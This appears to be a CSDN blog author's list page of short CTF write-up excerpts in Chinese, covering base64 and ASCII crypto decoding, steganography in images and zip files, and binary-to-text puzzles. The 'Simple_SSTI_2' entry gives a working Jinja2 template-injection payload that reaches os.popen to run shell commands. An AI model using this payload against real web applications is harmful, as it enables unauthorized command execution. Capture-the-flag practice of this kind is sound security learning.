![](https://img-blog.csdnimg.cn/20201014180756724.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
CTF
张麦麦
这个作者很懒,什么都没留下…
展开
-
Bugku Crypto 7+1+0
4nXna/V7t2LpdLI44mn0fQ==base64解码后发现奇数位不对,偶数数位符合bugku的flag形式。 相减ascii码后发现差128。遍历后还原。(atob('4nXna/V7t2LpdLI44mn0fQ==') .split('')) .map((i,index)=>{ if(index%2==0){ return String.fromCharCode(i.charCodeAt()-128) }else{ return i }}).join('')原创 2021-11-09 09:46:15 · 444 阅读 · 0 评论 -
Simple_SSTI_2 wp
payload{{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('cat flag').read()}}原创 2021-11-08 20:54:14 · 184 阅读 · 0 评论 -
魔法密文 Writeup| DASCTF Oct X 吉林工师
魔法秘文这题思路还好吧……但是真的属于把我做吐了的那种……具体见后文首先给了一个zip文件,解压出来一张魔法少女.png,通过binwalk分析出来隐藏了压缩包。直接用binwalk -e分离发现压缩包大小有问题。于是使用 hex 编辑器直接删掉了前面的图片部分,得到一个压缩包。压缩包中有两个文件,flag.txt是加密的,魔法萝莉简体未加密。 提示内容为:密码为32位中文。解压出来魔法萝莉简体,在hex视图下,字体文件末尾发现一串 urlcode 编码的字符。urldecode后得到如原创 2021-10-28 18:50:42 · 428 阅读 · 0 评论 -
【BUUCTF】MISC:另一个世界
首先查看图片本身是否有隐藏内容,使用stegsolve查找后并无。查看hex,末尾有一串二进制:01101011011011110110010101101011011010100011001101110011不妨先尝试转换下进制。以8个为单位尝试:let hex = "01101011011011110110010101101011011010100011001101110011"let nums = []for(let i = 0; i<=hex.length; i++){原创 2021-10-14 00:17:47 · 1764 阅读 · 0 评论